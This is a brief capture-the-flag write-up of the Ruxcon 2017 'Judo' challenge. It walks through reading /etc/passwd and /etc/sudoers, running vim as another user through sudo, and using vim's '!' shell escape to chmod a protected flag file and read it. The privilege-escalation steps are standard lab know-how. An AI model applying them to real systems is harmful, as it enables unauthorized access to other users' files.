This is my write up for the first Unix challenge at the Ruxcon 2017 security conference capture the flag (CTF).
The challenge was called ‘Judo’ and was worth 100 points.
Upon SSHing to the provided IP address as the jimbob user, we can see that there is one other user called kungfu-steve.
jimbob@judo-8w844:~$ cat /etc/passwd jimbob:x:1000:1000:,,,:/home/jimbob:/usr/bin/mon kungfu-steve:x:999:999:,,,:/home/kungfu-steve:/bin/bash
Looking inside this user’s home directory, we can see document.txt, which only allows the kungfu-steve user access.
jimbob@judo-8w844:~$ ls -la /home/kungfu-steve/ total 24 drwxr-xr-x 2 kungfu-steve kungfu-steve 4096 Sep 14 05:44 . drwxr-xr-x 1 root root 4096 Sep 14 05:44 .. -rw-r--r-- 19 kungfu-steve kungfu-steve 220 Aug 29 23:36 .bash_logout -rw-r--r-- 19 kungfu-steve kungfu-steve 3771 Aug 29 23:36 .bashrc -rw-r--r-- 19 kungfu-steve kungfu-steve 655 Aug 29 23:36 .profile ---------- 1 kungfu-steve kungfu-steve 43 Sep 14 05:44 document.txt
As this looks suspiciously like our flag, I figure we need to somehow become kungfu-steve to read the file.
After trying many things I eventually looked at the /etc/sudoers file, which included the following:
jimbob@judo-dz864:~$ cat /etc/sudoers jimbob ALL=(kungfu-steve) /usr/bin/vim
This basically says that the jimbob user can run vim as kungfu-steve. Using the sudo command shown below, I run vim.
jimbob@judo-8w844:~$ sudo -S -u kungfu-steve /usr/bin/vim sudo: unable to resolve host judo-8w844 [sudo] password for jimbob:
Within vim we can run commands by prefixing them with a !, as shown below.
:!id uid=999(kungfu-steve) gid=999(kungfu-steve) groups=999(kungfu-steve)
This confirms that we’re running commands as kungfu-steve, as we’re running vim as this user.
I then simply run the below command through vim so that our jimbob user, and anyone else for that matter, can now read the documents.txt file.
:!chmod 777 /home/kungfu-steve/documents.txt
The file can now be read by any user.
jimbob@judo-dz864:/home/kungfu-steve$ ls -la -rwxrwxrwx 1 kungfu-steve kungfu-steve 43 Sep 14 05:44 document.txt jimbob@judo-dz864:/home/kungfu-steve$ cat document.txt Flag{766150e4-83aa-11e6-be47-57c3ba62c51c}
We can now read the contents of the document.txt file as the jimbob user, which contains our flag string.
0 Comments.